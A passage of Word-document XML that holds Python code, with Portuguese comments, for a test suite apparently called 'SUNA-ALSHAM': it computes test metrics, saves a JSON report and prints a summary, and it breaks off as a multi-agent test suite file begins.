      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7F8CA5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        total_duration = time.time() - suite_start_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11436F42" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        coverage_percentage = (passed_tests / total_tests) * 100 if total_tests &gt; 0 else 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630FFE3B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779913AB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Métricas de performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46947916" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        performance_metrics = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F62579" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "avg_test_duration": statistics.mean([r.duration for r in test_results]) if test_results else 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26085CB0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "max_test_duration": max([r.duration for r in test_results]) if test_results else 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D89B97" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "min_test_duration": min([r.duration for r in test_results]) if test_results else 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D5A68D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "tests_per_second": total_tests / total_duration if total_duration &gt; 0 else 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20635FFE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6654FD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D72CDA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Criar relatório</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E070D9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        report = TestSuiteReport(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5623E1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            suite_name="SUNA-ALSHAM Comprehensive Test Suite",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAB298F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            total_tests=total_tests,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D661CFB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            passed_tests=passed_tests,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71728E57" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            failed_tests=failed_tests,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CB928B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            skipped_tests=skipped_tests,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C1D0E9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            total_duration=total_duration,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3478627F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            coverage_percentage=coverage_percentage,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0967728A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            performance_metrics=performance_metrics,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A1C7C9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            test_results=test_results,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397A57F1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            timestamp=datetime.now(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258C7DF0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            system_info=system_info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C81B4F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCC653D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3854B033" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        logger.info(f"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🎯</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Testes concluídos: {passed_tests}/{total_tests} passaram ({coverage_percentage:.1f}%)")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F8629B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEB9221" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        return report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A51A9D9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EDA399" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    def save_report(self, report: TestSuiteReport, filename: str = None):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAA2682" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """Salva relatório em arquivo JSON"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169421DF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        if filename is None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE416EB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085003F9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            filename = f"suna_test_results_{timestamp}.json"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B52FB1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F350AC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Converter para dict serializável</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6AB93E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        report_dict = asdict(report)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F514DE6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D264A3E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Converter datetime para string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FB169F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        def convert_datetime(obj):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9FB364" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            if isinstance(obj, datetime):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B1F72B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                return obj.isoformat()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E63FF92" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            elif isinstance(obj, dict):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D503A6F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                return {k: convert_datetime(v) for k, v in obj.items()}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DEAF96" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            elif isinstance(obj, list):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F02B953" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                return [convert_datetime(item) for item in obj]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668C88F4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            return obj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386EF6BF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FCCBC4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        report_dict = convert_datetime(report_dict)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6421D187" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00701225" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        with open(filename, 'w', encoding='utf-8') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6674D0B5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            json.dump(report_dict, f, indent=2, ensure_ascii=False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A77A399" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACBDC7A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        logger.info(f"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📊</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Relatório salvo em: {filename}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D6217F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        return filename</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CFAB33" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="17E7A7DC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>async def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1F5ECB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    """Função principal para executar os testes"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27844A3E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    print("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🧪</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUNA-ALSHAM Comprehensive Test Suite")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192104B7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    print("=" * 50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BEB24E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CB1B4D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    # Criar e executar suite de testes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E31EF4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    test_suite = ComprehensiveTestSuite()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E276982" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1907653D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC393CD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Executar todos os testes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2909F39E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        report = await test_suite.run_all_tests()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD3CD8F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4181ECFF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Salvar relatório</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306DCAD4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        report_file = test_suite.save_report(report)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0AF8D5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F91111" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Exibir resumo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0810A59A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        print("\n" + "=" * 50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01ADB20E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        print("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📊</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RESUMO DOS TESTES:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9483E5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        print(f"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Testes passaram: {report.passed_tests}/{report.total_tests}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F94ECF7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF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Testes falharam: {report.failed_tests}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F53AB8E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        print(f"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>⏭️</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Testes pulados: {report.skipped_tests}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E928C0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        print(f"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📈</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cobertura: {report.coverage_percentage:.1f}%")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CD1022" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        print(f"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>⏱️</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Duração total: {report.total_duration:.2f}s")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F0E601" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        print(f"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📄</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Relatório: {report_file}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB4A5A8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C43EA15" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Status final</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64780F7A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        if report.failed_tests == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF6B214" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            print("\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🎉</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TODOS OS TESTES PASSARAM! SISTEMA VALIDADO!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1AA5A5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5198DC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            print(f"\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>⚠️</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> {report.failed_tests} TESTES FALHARAM - VERIFICAR LOGS")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71621BAB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCC509A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        return report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483D09EC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B284BD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    except KeyboardInterrupt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239B36FB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        print("\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🛑</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Testes interrompidos pelo usuário")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1498F961" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA3A893" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        print(f"\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Erro durante execu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>çã</w:t>
      </w:r>
      <w:r>
        <w:t>o dos testes: {str(e)}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6086DAEE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        logger.error(f"Erro na suite de testes: {str(e)}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3089B9E6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="2EAD7370" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F326315" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    # Executar testes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744EEB05" w14:textId="73496D2D" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    asyncio.run(main())</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAA5917" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="111591CF" w14:textId="48542B05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multi_agent_test_suite.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DC8927" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048655F8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🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SUNA-ALSHAM Multi-Agent Test Suite</w:t>
      </w:r>
